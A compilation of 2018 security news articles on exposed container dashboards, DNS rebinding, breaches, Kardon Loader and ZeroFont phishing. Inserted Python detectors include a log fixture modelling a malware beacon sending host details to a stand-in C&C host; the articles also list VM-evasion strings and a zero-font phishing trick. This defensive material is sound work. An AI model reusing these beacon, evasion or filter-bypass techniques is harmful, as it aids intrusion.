Researchers Find 21,000 Exposed Container Orchestration Systems
21.6.2018 securityweek  Vulnerability

Researchers Discovered More Than 21,000 Container Orchestration and API Management Systems Exposed to the Public Internet

Public cloud and container technology is increasingly used by IT people because of the ease and speed of deployment, ephemeral workloads, and the ability to scale quickly and easily -- basically, the agility that public cloud and containers brings to DevOps. Popular container orchestration systems include Kubernetes, Docker Swarm, OpenShift and Mesosphere.

Container clusters are commonly managed, or orchestrated, from administrator dashboards that provide a single interface to manage all aspects of the containers. Kubernetes describes itself as a set of independent, composable control processes that continuously drive the current state towards the provided desired state. It says this eliminates the need for orchestration, yet it also says it orchestrates computing, networking, and storage infrastructure on behalf of user workloads.

The point, however, is that all the different container orchestrations provide a single administrative dashboard for administrator control. This dashboard can spin up new containers, delete unwanted containers, and access both the compute power and stored data on every container. Rarely, if ever, should this dashboard need to be visible to the internet.

"In early June 2018," states Lacework in a study (PDF) released Tuesday, "Lacework discovered more than 21,000 container orchestration and management systems on the internet, and these results highlight the potential for attack points caused by poorly configured resources, lack of credentials, and the use of non-secure protocols."

The issue here is that if a system is exposed to the internet when it need not be -- indeed should not be -- then it is likely that it is inadequately secured. If it has been configured to require multi-factor authentication, then access to the orchestration system will have some defense. But, "simple authentication simply won't be good enough," Lacework's chief security architect, Dan Hubbard, told SecurityWeek: "if you have 'admin' and 'abc123', anyone who can find the admin panel will be able to crack it."

The report notes that most of the management nodes it discovered are configured to require access credentials, but adds, "These organizations, and the others who will replicate their mistakes, are opening themselves up to brute force password and dictionary attacks."

It is generally considered that password security on its own is ineffective. But an insecure container orchestration system exposed on the internet is a bigger threat to a company's cloud-based container infrastructure than a backdoor into a traditional data center. The latter might provide access to a single server under the oversight of the security team and with additional security controls within the data center infrastructure. A container orchestration dashboard, however, provides immediate access to every container in the swarm.

"Consider what would happen," warns the report, "if [attackers] had all this but could operate their attack all from the Internet, hiding behind proxy servers, VPN concentrators, and compromised routers, essentially masking who they are and where they are coming from. Basically, your data, your customer’s data, and the foundation on which you’ve built your organization would be in major trouble."

Hubbard believes the basic problem that leaves orchestration dashboards visible to any potential attacker is a disconnect between the DevOps team and the security team. Faced by the need for development speed, DevOps uses containers for all the right reasons. But containers are outside of the traditional security perimeter; and the security team may not even be aware of their use.

"We need to build a bridge from DevOps to security if one doesn't already exist -- that's the missing piece here," said Hubbard. "It's about communicating and making sure that the security team has the tools to know when this is happening. It's a combination of communication, working together, and for the security team making sure they know when it is happening and/or can detect and handle it when it does happen."

Exposed container orchestration dashboards are potentially far more dangerous than the more frequently discussed misconfigured S3 buckets. S3 buckets are simple storage devices. Misconfiguration of S3 buckets gives unauthorized access to the stored content, but gives no access to any compute capability.

"The most common attack we are seeing now," explained Hubbard, "is that attackers are finding these open servers and they are going in there without the company being aware. The attackers are installing their own software and they're starting new machines and new containers in order to do bitcoin mining. They're doing this through these open panels they find on the internet. In this scenario the bad guys are getting access to your compute -- on all the machines -- and they can install their own code and run whatever they want; and they can access your data. So, it's a lot more powerful than just finding a mis-configured S3 bucket."

"Let’s be clear," says the Lacework report. "We are BIG BELIEVERS in all things public cloud, but we need to raise the bar, and raise it quick." The important thing here is to remove the orchestration panels from the internet.

"You should be able to connect securely through another way," advises Hubbard, "whether it's through a central server or through a direct connection through a VPN. Also, depending on the management technology... if it's K8 or whatever... they all have different defaults that they ship with and different ways you can configure authentication. Of course, MFA is the best."

The high-level message from this report is that developers deploying in the public cloud have a responsibility to think about security, and that security staff who know or suspect that their company is deploying in the public cloud have a responsibility to find out, and then to deploy the technologies and processes needed to make sure those deployments are secure. At the moment, there are too many examples of this not happening.


Google Devices Leak Precise Physical Locations: Researcher
21.6.2018 securityweek  Attack

A newly discovered attack against Google Home and Chromecast devices can reveal a user’s precise physical location, a security researcher has discovered.

The issue, Tripwire’s Craig Young reveals, is related to two problems common to Internet of Things (IoT) devices: the rare use of authentication for connections received on a local network and the frequent use of HTTP for configuration or control. Because of these poor design choices, websites can sometimes interact with network devices.

Young discovered that Google’s Home app, which is used to configure Google Home and Chromecast, performs some tasks using a local HTTP server, and some commands are sent directly to the device, without authentication.

The app implies that the user should be logged into a Google account linked with the target device, but no authentication mechanism is built into the protocol level, Young says.

Using an attack technique called DNS rebinding, the security researcher was able to “use data extracted from the devices to determine their physical location with astonishing accuracy.” Young also published a video detailing the attack.

Through DNS rebinding, an attacker can implement a piece of code on a website to bridge to the local network and bypass the same-origin policy (SOP).

The code points to a subdomain of the attacker's site, and the DNS server for that subdomain is configured to answer alternately with the attacker's public address and a local address. When the victim loads the page, the browser first resolves the subdomain to the attacker-controlled server using a record with a short time to live (TTL); once that record expires, the same name resolves to the local address, so the script's subsequent requests are sent to a device on the victim's own network.

“I was able to create a basic end-to-end attack that worked for me in Linux, Windows and macOS using Chrome or Firefox. Starting from a generic URL, my attack first identifies the local subnet and then scans it looking for the Google devices and registers a subdomain ID to initiate DNS rebinding on the victim. About a minute after the page had loaded, I was looking at my house on Google Maps,” Young says.

The security researcher also notes that, even in incognito mode, Google Maps can typically locate a device within 10 meters. This is apparently possible through the analysis of Wi-Fi access point data and triangulation using information collected from devices that opted into Google’s enhanced location services.

The newly discovered attack, the researcher says, can be leveraged for blackmail or extortion purposes, in scams like fake FBI or IRS threats to release sensitive information or photos to friends and family.

Furthermore, because DNS rebinding is not the only way to exploit this bug, browser extensions and mobile apps can abuse “their unrestricted network access to directly query the devices without relying on or waiting for a DNS cache refresh.” Thus, advertisers can obtain location data and correlate it to other tracked web activity to tie it to a real-world identity.

“These problems are not specific to Google devices. Over the years that I’ve been auditing embedded devices, it is not the first time that I’ve seen a device supplying WiFi survey data or other unique device details like serial numbers. Smart TV’s, for example, commonly identify themselves with a unique screen ID as part of the DIAL protocol used to support Cast-like functionality,” Young says.

While the best mitigation is to completely disconnect devices, Young agrees that in today’s connected world such an option might not be possible. However, there are steps users can take to minimize exposure.

One way of dealing with this is network segmentation, where all connected devices use their own network, separate from the normal home network where all Internet browsing occurs. Adding a second router on the network, specifically for these connected devices, is the best option for most users, the researcher suggests.

Using a DNS rebind protection solution is another way to prevent such an attack. According to Young, the DNS software commonly used in consumer routers does include DNS rebind protection, although it isn’t always enabled or easy to enable. Deploying a local DNS server with rebinding protections enabled is also an option.
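The rebind protection described above amounts to one rule on the resolver: a name outside the local zone must never resolve to a local-scope address. The following is an added illustration of that rule (not Tripwire's or any router vendor's code); the allowlist suffixes and the resolver log entries are constructed for the example.

```python
import ipaddress
from typing import Iterable, List

# Names that are expected to resolve to local addresses on this network
# (assumed allowlist, the equivalent of dnsmasq's rebind-domain-ok).
LOCAL_OK_SUFFIXES = (".lan", ".home.arpa", ".localhost")

# 100.64.0.0/10 (carrier-grade NAT) is not covered by is_private on every
# Python version, so it is checked explicitly.
CGNAT = ipaddress.ip_network("100.64.0.0/10")


def is_local_address(addr: str) -> bool:
    """True for addresses a public hostname should never resolve to."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip in CGNAT)


def filter_answers(qname: str, answers: Iterable[str]) -> List[str]:
    """Answers that may be returned to the client. Local-scope addresses are
    dropped unless the queried name is on the local allowlist."""
    answers = list(answers)
    if qname.lower().rstrip(".").endswith(LOCAL_OK_SUFFIXES):
        return answers
    return [a for a in answers if not is_local_address(a)]


def is_rebinding_attempt(qname: str, answers: Iterable[str]) -> bool:
    """A non-local name answering with a local-scope address is the signature
    of the 'rebound' second resolution described in the article."""
    answers = list(answers)
    return len(filter_answers(qname, answers)) != len(answers)


# Constructed resolver log: (queried name, answers). The second entry models
# the rebound answer an attacker's DNS server sends once the short TTL expires.
SAMPLE_LOG = [
    ("cdn.example.com", ["93.184.216.34"]),
    ("abc123.attacker.example", ["192.168.1.23"]),  # rebound to a LAN host
    ("printer.lan", ["192.168.1.50"]),               # legitimately local
    ("x.attacker.example", ["::1"]),                 # IPv6 loopback
]


def flagged_names(log=SAMPLE_LOG) -> List[str]:
    """Names in the log whose answers would have been filtered."""
    return [name for name, answers in log if is_rebinding_attempt(name, answers)]


if __name__ == "__main__":
    for name in flagged_names():
        print("rebinding attempt blocked:", name)
```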

“In the face of DNS rebinding and mobile apps, all services running on the local network (and especially HTTP services) must be designed as if they were directly exposed to the Internet. We must assume that any data accessible on the local network without credentials is also accessible to hostile adversaries. This means that all requests must be authenticated and all unauthenticated responses should be as generic as possible,” Young says.


Flight Tracker Flightradar24 Hit by Data Breach
21.6.2018 securityweek  CyberCrime

Flightradar24 hacked

Flightradar24, a highly popular flight tracking service based in Sweden, has instructed some users to change their passwords after detecting a breach on one of the company’s servers.

Earlier this week, some Flightradar24 users started receiving emails alerting them of a security breach in which email addresses and password hashes associated with accounts registered prior to March 16, 2016, may have been compromised.

Some of the individuals who received the notification complained that the emails looked like phishing attempts, especially since the company had not mentioned the incident on its website or social media channels. The company has, however, confirmed to users who inquired via social media and its forum that the emails are legitimate.

In response to posts on the Flightradar24.com forum, a company representative highlighted that no personal information was compromised, and noted that payment information is not stored on its systems.

Flightradar24 said it was confident that the incident had been contained after the targeted server was “promptly” shut down after the intrusion was detected.

The company did not specify which hashing algorithm was used for the exposed passwords, but noted that the compromised system had been retired and used an older algorithm that allows for the hashes to be cracked. Affected users’ passwords have been reset as a result. The flight tracker says it has been using a more secure hashing algorithm since 2016.

The company has not said how many users are impacted – its notification only mentions that the incident affects a “small subset of Flightradar24 users.” However, considering that the service is said to have more than 40 million users per month and its mobile applications are among the most installed apps on Google Play and the Apple App Store, even a “small subset” could be a significant number.

Flightradar24 says it has notified the Swedish Data Protection Authority in order to comply with the EU’s General Data Protection Regulation (GDPR).


Kardon Loader Allows Anyone to Build a Distribution Network
21.6.2018 securityweek  Virus

The author of a newly discovered malware downloader allows interested parties to set up a botshop and build a malware distribution network, Netscout Arbor reveals.

Dubbed Kardon Loader, the downloader started being advertised on underground forums as a paid beta product on April 21, 2018. The actor behind it, using the online handle Yattaze, asks $50 for the malicious program and offers it as a standalone build, with charges for each additional rebuild. He/she also allows customers to set up a botshop and sell access to their own operation.

Downloader malware and botshops are typically used by malware authors and distributors to build networks and create botnets that are then leveraged for the distribution of information stealers, ransomware, banking Trojans, and other threats. These networks are often offered as a service on underground markets.

The newly observed Kardon Loader appears to be a rebrand of the ZeroCool botnet, which was developed by the same actor (who had an account on the forum since April 2017 and received multiple vouches for this product).

The actor, Netscout Arbor reveals, is using a professional looking advertisement for the loader, with its own logo, and provides a disclaimer claiming that the software should not be used maliciously. The developer also published a YouTube video detailing the downloader’s admin panel functionality.

Kardon Loader, the actor claims, has bot functionality, can download/execute/update/uninstall tasks, has debug and analysis protection, supports TOR and Domain Generation Algorithm (DGA), includes usermode rootkit functionality, and RC4 encryption (not yet implemented).

“ASERT found many of these features absent in the samples reviewed. All samples analyzed used hard-coded command and control (C&C) URLs instead of DGA. There was also no evidence of TOR or user mode rootkit functionality in the binaries,” the security firm reveals.

For anti-analysis, the malware downloader attempts to get the module handle for a variety of DLLs associated with antivirus, analysis, and virtualization tools, and exits its process if any of the targeted handles are returned.

Kardon Loader can also enumerate the CPUID Vendor ID value and compare it against values associated with virtual machines (such as Microsoft HV, VMware, and VBox). Should any of them be detected, the malware also exits.

The threat uses an HTTP-based C&C infrastructure and base64 encoded URL parameters. When executed, the malware sends HTTP POSTs to the C&C server, with information such as an identification number, operating system, user privilege, initial payload, computer name, user name, and processor architecture.

Depending on the server response, the malware can download and execute additional payloads, visit a website, upgrade current payloads, or uninstall itself.

The administration panel has a simple design, with a dashboard where bot distribution and install statistics are displayed. A “bot store” feature allows the bot admin to generate access keys for customers, providing them with the ability to execute tasks based on the predefined parameters.

“Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking Trojans/credential theft etc. […] Although only in public beta stage this malware features bot store functionality allowing purchasers to open up their own botshop with this platform,” Netscout Arbor concludes.


Massachusetts Man Pleads Guilty to ATM Hacking
21.6.2018 securityweek  Crime

A Massachusetts man pleaded guilty to his role in an ATM “jackpotting” operation, the United States Department of Justice announced this week.

ATM jackpotting is a type of attack where individuals who have physical access to an automated teller machine connect to it and then use malware or specialized electronic equipment (or both) to gain control of the system’s operations.

Long observed in Europe and Asia, ATM jackpotting only arrived in the United States in late 2017. In January 2018, the US Secret Service issued a warning to alert law enforcement and financial institutions on jackpotting attacks. Incidents were observed in Connecticut and elsewhere.

In early February, the DoJ announced that Alberto Fajin-Diaz, 31, a citizen of Spain, and Argenys Rodriguez, 21, of Springfield, Massachusetts, had been charged over ATM jackpotting. The two were arrested on January 27 after being found near an ATM that had been compromised with jackpotting malware to dispense $20 bills.

On Monday, John H. Durham, United States Attorney for the District of Connecticut, announced that Rodriguez pleaded guilty to his role in the ATM jackpotting scheme.

After being alerted by Citizens Bank investigators of a possible jackpotting attack on an ATM in Cromwell, the police encountered Rodriguez and Fajin-Diaz in the vicinity of an “ATM that had been compromised with malware and was in the process of dispensing $20 bills,” the DoJ says.

In the duo’s vehicle, the police found tools and electronic devices that could be used to compromise ATMs to dispense cash. The two men also had around $5,600 in cash, yet the investigation revealed that over $63,000 had been taken from the ATM on that date.

The investigators later discovered that, on January 22, 2018, Rodriguez, Fajin-Diaz and others illegally obtained $63,820 from a Citizens Bank ATM in Rhode Island.

Rodriguez is scheduled to be sentenced on September 26, 2018. He faces a maximum term of imprisonment of 30 years. Fajin-Diaz pleaded guilty to his role in the ATM jackpotting attacks on June 12, 2018, and awaits sentencing.


Thousands of Mobile Apps Leak Data from Firebase Databases
21.6.2018 securityweek  Mobil

Thousands of mobile applications running on iOS and Android have exposed over 113 gigabytes of data from 2,300 unsecured Firebase databases, enterprise mobile security firm Appthority says in a new report.

The new research follows last year’s report on the HospitalGown attack vector, which revealed that more than 1,000 mobile apps on enterprise devices were exposing potentially sensitive data via insecure connections with backend servers.

Similar to the HospitalGown vulnerability, which was found in mobile applications’ architecture and infrastructure, the new security flaw resides in mobile app developers failing to require authentication to a Google Firebase cloud database.

One of the most popular backend database technologies for mobile apps, Firebase does not secure user data by default. It does not warn developers when data is not secure and does not provide third-party encryption tools either.

To ensure data is secure, app builders need to specifically implement user authentication on all database tables and rows, but that rarely happens, Appthority explains in a report (PDF). Because of that, an attacker can easily find open Firebase app databases and access private records.

The security issue, which the security firm refers to as the Firebase vulnerability, has a huge impact, leaking 100 million records (113 gigabytes) of data from unsecured Firebase databases.

After digging through millions of applications, the security researchers discovered 28,502 mobile apps (27,227 Android and 1,275 iOS apps) connected to a Firebase database, 3,046 of which (10.69%) were found vulnerable (2,446 Android and 600 iOS apps).

The 3,000 vulnerable applications, the security firm notes, exposed over 100 million records of data from 2,300 vulnerable databases (1 in 10 Firebase databases, or 10.34%, were found vulnerable). On Android alone, the vulnerable applications had more than 620 million downloads.

Impacted applications belong to multiple categories, including tools, productivity, health and fitness, communication, finance and business apps, and impact over 62% of enterprises.

Affected organizations included banks, telecoms, postal services, ride sharing companies, hotels and educational institutions in the United States, Europe, Argentina, Brazil, Singapore, Taiwan, New Zealand, India, and China.

Analysis of the exposed data revealed 2.6 million plain text passwords and user IDs; more than 4 million Protected Health Information records (including chat messages and prescription details); 25 million GPS location records; 50 thousand financial records including banking, payment and Bitcoin transactions; and over 4.5 million Facebook, LinkedIn, Firebase and corporate data store user tokens.

The report reveals that 975 (40%) of the vulnerable apps were business-related, installed in active customer environments, leaking corporate private keys and access credentials (potentially allowing attackers to exfiltrate sensitive intellectual property), private business conversations, and sales information.

The number of applications connecting to Firebase databases has increased significantly since 2015, and so has the number of vulnerable applications. Between 2015 and 2016, apps using Firebase grew 2,112%, while the vulnerable apps grew 1,225%. Between 2016 and 2017, the growth rates were 271% and 74%, respectively.

“The Firebase vulnerability is a significant and critical mobile vulnerability exposing vast amounts of sensitive data. The large number of vulnerable apps and the wide variety of data shows that enterprises can’t rely on mobile app developers, app store vetting or simple malware scans to address data security,” Seth Hardy, Appthority Director of Security Research, commented.


macOS' Quick Look Cache May Leak Encrypted Data
21.6.2018 securityweek  Apple

The Quick Look mechanism on macOS, which allows users to check file contents without actually opening the files, may leak information on cached files, even if they reside on encrypted drives or if the files have been deleted.

According to Apple, “Quick Look enables apps like Finder and Mail to display thumbnail images and full-size previews of Keynote, Numbers, Pages, and PDF documents, as well as images and other types of files.”

Quick Look registers the com.apple.quicklook.ThumbnailsAgent XPC service, which creates a thumbnails database and stores it in the /var/folders/.../C/com.apple.QuickLook.thumbnailcache/ directory.

The issue, discovered by Wojciech Reguła, is that the service creates thumbnails of all supported files located in an accessed folder, regardless of whether the folder resides on an internal or external drive. It does the same for macOS Encrypted HFS+/APFS drives as well.

Because of that, the SQLite database in the com.apple.QuickLook.thumbnailcache/ directory contains previews, metadata and file paths of photos and other files in the accessed folders, depending on the file type and the installed Quick Look plugins.

Said thumbnails, however, are not created only for the files a user has chosen to preview with Quick Look (which automatically results in the service caching file information), but for other files residing in the accessed folders as well.

The thumbnails created for previewed files are larger, while smaller thumbnails are created for the other files, but even those could be used to leak content, Objective-See’s Patrick Wardle suggests.

To demonstrate the bug, Reguła created a VeraCrypt container, mounted it, and saved an image in it. He also cached it in Quick Look by pressing space on it. Next, he placed a second photo on a macOS Encrypted HFS+/APFS drive.

With both images cached, information about the full paths and the file names is stored in the aforementioned database, and the researcher used a modified script to exfiltrate the thumbnails.data file and retrieve the thumbnails.

“This technique is known and helps a lot in forensics, but I honestly didn't know about this before. It was the big surprise for me to see that even files stored in encrypted containers may be that cached. Have it on mind when you will be using space to preview photos,” Reguła notes.

According to Wardle, this behavior “can be replicated in a password-protected encrypted APFS container.” When creating a file in the container, a thumbnail of the file is created and cached even if the user simply views the container in the UI, without previewing the file, he explains.

Even if the encrypted volume is unmounted, the thumbnail of the file continues to be stored in the temporary directory, meaning that it can be extracted. The cached thumbnails are created for files on USB drives that users insert into their Macs as well.

“Depending on the size of the 'preview' images generated for Finder (and other variables, such as the size of the font used in the file), the contents of the even documents may be discernible from the thumbnail alone,” Wardle notes.

With the main drive encrypted, the cached data remains safe on a powered off system, but it can be revealed to an attacker or law enforcement accessing the system, even if the password-protected encrypted containers have been unmounted.

However, it is possible to clear the Quick Look cache when unmounting a container, using the qlmanage utility. The qlmanage -r cache command should immediately purge the cache, without requiring a system reboot.


Building a malware distribution network is too easy with Kardon Loader
21.6.2018 securityaffairs  Virus

Researchers at Netscout Arbor have discovered a malware downloader advertised on underground forums as a paid open beta product, its name is Kardon Loader.

Researchers from Netscout Arbor have discovered a downloader advertised on underground forums dubbed Kardon Loader, it allows customers to build a malware distribution network or a botshop.

Ads for Kardon Loader were first discovered on April 21, 2018. The author, who goes online by the moniker Yattaze, asks $50 for the program and offers it as a standalone build, charging users for each additional rebuild.

“Kardon Loader is a malware downloader advertised on underground forums as a paid open beta product.” reads a blog post published by Netscout Arbor.

“The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.”

Downloader malware and botshops are essential components for the creation of botnets that could be used to distribute a broad range of malware such as ransomware, banking Trojans, and cryptocurrency miners.

Crooks typically offer access to such distribution networks as a service on cybercrime underground markets.

Experts believe the Kardon Loader represents a rebrand of the ZeroCool botnet that was built by the same actor.

The advertisement for the Kardon Loader appears very professional, the actor created its own logo and provides a disclaimer claiming that the software should not be used for malicious purposes. He also published a YouTube video that shows the admin panel of the platform.

Below the bot functionalities advertised by the actor:

Bot Functionality
Download and Execute Task
Update Task
Uninstall Task
Usermode Rootkit
RC4 Encryption (Not Yet Implemented)
Debug and Analysis Protection
TOR Support
Domain Generation Algorithm (DGA)

Researchers from ASERT analyzed several samples of the malicious code and noticed that some advertised features were not implemented: all samples used hard-coded command and control (C&C) URLs instead of a DGA, and neither the “usermode rootkit” nor Tor support was present.

The experts determined that the downloader attempts to obtain module handles for a variety of DLLs associated with antivirus, analysis, and virtualization tools, and halts its process if any of the handles is returned.

To avoid execution in a virtualized environment, Kardon Loader also enumerates the CPUID Vendor ID value and compares it against the following strings:

KVMKVMKVM
Microsoft Hv
VMwareVMware
XenVMMXenVMM
prl hyperv
VBoxVBoxVBox
These are known CPUID Vendor ID values associated with virtual machines. If one of them is detected, the malware also exits.

The malicious code uses an HTTP-based C&C infrastructure with URL parameters that are base64 encoded.

“Upon execution Kardon Loader will send HTTP POSTs to the C2 with the following fields:

ID = Identification Number
OS = Operating System
PV = User Privilege
IP = Initial Payload (Full Path)
CN = Computer Name
UN = User Name
CA = Processor Architecture”

In turn, the server provides instructions to the malware, such as download and execute additional payloads, visit a website, upgrade current payloads, or uninstall itself.
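The check-in above (fixed short field names, every value base64, sent by POST) is a pattern a proxy log can be scanned for. The following is an added detection example (not ASERT's code): it assumes the fields travel as URL query parameters, as the analysis' mention of base64 URL parameters suggests, and the proxy log lines and host names are constructed.

```python
import base64
import binascii
import re
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Field names from the check-in described in the analysis.
KARDON_FIELDS = {"ID", "OS", "PV", "IP", "CN", "UN", "CA"}
MIN_MATCHES = 5  # tolerate a rebuild that drops or renames a field or two
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_b64(value: str) -> Optional[str]:
    """Strict base64 decode to text; None if the value is not clean base64."""
    if not value or len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify_request(method: str, url: str) -> Optional[Dict[str, str]]:
    """Decoded beacon fields if the request matches the check-in pattern
    (POST, known field names, every value base64), otherwise None."""
    if method.upper() != "POST":
        return None
    # Note: parse_qs turns '+' into a space, so standard base64 containing
    # '+' or '/' must be URL-encoded in real traffic; the samples avoid both.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    decoded: Dict[str, str] = {}
    for key, values in params.items():
        if key.upper() in KARDON_FIELDS:
            text = decode_b64(values[0])
            if text is None:  # a known name carrying plain text is not this beacon
                return None
            decoded[key.upper()] = text
    return decoded if len(decoded) >= MIN_MATCHES else None


# Constructed proxy log (timestamp client method url status). The second line
# models a check-in; its values are base64 of "123456", "Windows 10", "Admin",
# r"C:\tmp\k.exe", "DESKTOP-1", "bob" and "x64".
SAMPLE_LOG = [
    "2018-06-21T10:00:01Z 10.1.2.3 GET http://www.example.com/index.html 200",
    "2018-06-21T10:00:05Z 10.1.2.3 POST http://c2.example.invalid/gate.php"
    "?ID=MTIzNDU2&OS=V2luZG93cyAxMA==&PV=QWRtaW4=&IP=QzpcdG1wXGsuZXhl"
    "&CN=REVTS1RPUC0x&UN=Ym9i&CA=eDY0 200",
    "2018-06-21T10:00:09Z 10.1.2.4 POST http://shop.example.com/cart?ID=42&OS=web 200",
]


def scan_log(lines: Iterable[str]) -> List[Tuple[str, str, Dict[str, str]]]:
    """(client, C&C host, decoded fields) for each line that looks like a check-in."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        _ts, client, method, url = parts[:4]
        fields = classify_request(method, url)
        if fields:
            hits.append((client, urlsplit(url).netloc, fields))
    return hits


if __name__ == "__main__":
    for client, host, fields in scan_log(SAMPLE_LOG):
        print(f"{client} -> {host}: {fields}")
```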

The administration panel is very simple: it implements a dashboard that provides information about the bot distribution and statistics about the installations.

“A notable feature of this panel is the bot store functionality allowing the bot admin to generate access keys to customers that would give them the ability to execute tasks based on the predefined parameters,” continues the analysis.

“Although only in public beta stage this malware features bot store functionality allowing purchasers to open up their own botshop with this platform.”

The analysis includes the IoCs that could be used by organizations to block malicious activity associated with Kardon Loader.


ZeroFont phishing attack can bypass Office 365 protections
21.6.2018 securityaffairs
Phishing

ZeroFont phishing attack – Crooks are using a new technique that involves manipulating font sizes to bypass Office 365 protections.

According to cloud security firm Avanan, one of the detection mechanisms in Office 365 involves natural language processing to identify the content of the messages typically used in malicious emails.

For example, emails that mention “Apple” or “Microsoft” but are not sent from those companies' legitimate domains, or messages referencing user accounts, password resets or financial requests, are flagged as malicious.

Experts from Avanan discovered phishing campaigns using emails in which some of the content is set to be displayed with a zero-size font via <span style="FONT-SIZE: 0px">; for this reason, they dubbed the technique ZeroFont.

“Recently, we have been seeing a number of phishing attacks using a simple strategy to get their blatant email spoofs past Microsoft’s phishing scans. The tactic, which we are calling ZeroFont, involves inserting hidden words with a font size of zero that are invisible to the recipient in order to fool Microsoft’s natural language processing.” reads the analysis published by Avanan.

The email appears normal to the recipient, but Microsoft’s filters also analyze the text set to a font size of “0”.

[Image: phishing zerofont]

Summarizing, while the user sees classic phishing content like this:

[Image: phishing zerofont]

Microsoft’s filter will see the overall text, including the words written with the “FONT-SIZE: 0px” attribute. This text, of course, does not appear to be malicious content:

[Image: phishing zerofont]

“Microsoft can not identify this as a spoofing email because it cannot see the word ‘Microsoft’ in the un-emulated version. Essentially, the ZeroFont attack makes it possible to display one message to the anti-phishing filters and another to the end user,” Avanan’s Yoav Nathaniel said in a blog post.

Natural language processing is essential to prevent phishing attacks, but a technique like ZeroFont demonstrates that attackers can bypass such filters with a simple trick.

In the past, other techniques were devised to bypass anti-phishing filters, for example, the Punycode phishing attack, the baseStriker phishing attack, the Unicode phishing attack, and the Hexadecimal Escape Characters phishing attack.


Hackers Steal $31 Million from South Korean cryptocurrency exchange Bithumb
21.6.2018 securityaffairs  Cryptocurrency

Just weeks after the Korean exchange Coinrail was hacked, the Bithumb crypto exchange has been breached, and crooks stole over $30 million in cryptocurrency.
It has happened again: for the second time in a year, the cryptocurrency exchange Bithumb has been hacked.

The South Korean cryptocurrency exchange confirmed that hackers stole 35 billion won ($31.6 million) worth of cryptocurrency between June 19 and June 20.

In response to the incident, the exchange moved all funds to cold wallets and temporarily suspended the deposits and blocked user withdrawals.

Bithumb (@BithumbOfficial), 2:49 AM - Jun 20, 2018:
[Notice for the temporary suspension of the deposits]
Due to the increasing safety issues, we are changing our wallet system.
Please do not deposit until we notify.
*All deposits are not deposited into your wallet until all changes are completed.

Bithumb (@BithumbOfficial), replying to @BithumbOfficial, 3:04 AM - Jun 20, 2018:
*All deposit and withdrawal service will be stopped to make sure the security. We will keep notice you of the restart of the service. We apologize for your inconvenience and thanks for your understanding.

At the time of writing, Bithumb did not reveal any details about the security breach, but it announced that it will cover losses.

“We have noticed that between the last night and today morning, about 35,000,000,000 KRW worth cryptocurrencies have been stolen. However, this loss will be compensated by Bithumb’s own reservoir, and all of our assets are securedly saved in Bithumb’s cold wallet.” reads the security advisory published by Bithumb.

“However, due to implementation enhancement as well as security check on deposit / withdrawal services, cryptocurrency deposit / withdrawal and KRW withdrawal service will be halted for time being and services are thoroughly reviewed.”

Bithumb is one of the top 10 most popular cryptocurrency exchanges; experts noticed that the Bitcoin price fell 3 percent following the announcement of the incident.


This is the second time in a year that Bithumb has suffered a security breach: in July 2017 hackers stole more than $1 million in Bitcoin and Ether from the accounts of several users of the exchange.

Experts argued that the overall funds stolen at the time were greater than initially thought.

A few weeks ago, another South Korean exchange, Coinrail, announced a cyberheist. Attackers stole over $40M worth of ICO tokens that were maintained in the servers of the exchange.

In December, the South Korean cryptocurrency exchange Youbit shut down after being hacked twice in a few months.


China-linked Thrip APT group targets defense and satellite firms
21.6.2018 securityaffairs  APT

Symantec has tracked a new APT group, named Thrip, that targeted satellite operators, telco companies and defense contractors in the US and Southeast Asia.
Chinese APT groups are always very active. Experts at Symantec have tracked a new APT group, named Thrip, that has breached the systems of satellite operators, telecommunications companies and defense contractors in the United States and Southeast Asia.

The Thrip group has been active since 2013, but this is the first time Symantec publicly shared details of its activities.

“We’ve been monitoring Thrip since 2013 when we uncovered a spying campaign being orchestrated from systems based in China. Since our initial discovery, the group has changed its tactics and broadened the range of tools it used. Initially, it relied heavily on custom malware, but in this most recent wave of attacks, which began in 2017, the group has switched to a mixture of custom malware and living off the land tools. ” reads the analysis published by Symantec.


Thrip used a combination of custom malware and legitimate tools in its attacks; the list of victims is long and includes a satellite communications operator.

The hackers targeted devices involved in operations and infected computers running software that monitors and controls satellites; this suggests the attackers may also be interested in sabotage.

Another victim of the group is a company specializing in geospatial imaging and mapping.

“[Thrip] targeted computers running MapXtreme GIS (Geographic Information System) software which is used for tasks such as developing custom geospatial applications or integrating location-based data into other applications. It also targeted machines running Google Earth Server and Garmin imaging software.” continues the analysis.

“The satellite operator wasn’t the only communications target Thrip was interested in. The group had also targeted three different telecoms operators, all based in Southeast Asia.”

The group also targeted three telecoms firms in Southeast Asia and a defense contractor.

The arsenal of the group includes the data stealer Trojan.Rikamanu and its evolution Infostealer.Catchamas, which implements more sophisticated data stealing features and evasion capabilities.

The APT group also used the Trojan.Mycicil, a keylogger that is available for sale on Chinese underground marketplaces, and the Backdoor.Spedear and Trojan.Syndicasec malware.

The Thrip APT also used many legitimate tools, including the Windows SysInternals utility PsExec, PowerShell, Mimikatz, and the LogMeIn remote access software.

Further details, including IoCs, are reported in the analysis published by Symantec.


Flight tracking service Flightradar24 suffered a data breach
21.6.2018 securityaffairs  Incident

The popular flight tracking service Flightradar24 has discovered a data breach that affected one of its servers.
The company notified its users of the incident via email and asked them to change their passwords; the passwords of affected users have been reset.

FlightRadar24 promptly reported the incident to the Swedish Data Protection Authority in order to comply with the EU’s General Data Protection Regulation (GDPR).

According to Flightradar24, hackers may have accessed email addresses and password hashes associated with accounts registered prior to March 16, 2016.

At the time of writing there is no information about the hashing algorithm that was used to protect the passwords.

Initially many users that received the message believed that the data breach notification was the result of a phishing campaign because there was no official news from Flightradar24, but later the company admitted the incident and confirmed that the emails were legitimate.

Senile Delinquent (@SenileDelinque1), 18 Jun:
@flightradar24 Is this for real or is a phishing expedition? Clicking on the Unsubscribe link at the end of the email takes me to an odd website. Anyone else had this? pic.twitter.com/3P0Lensv5B

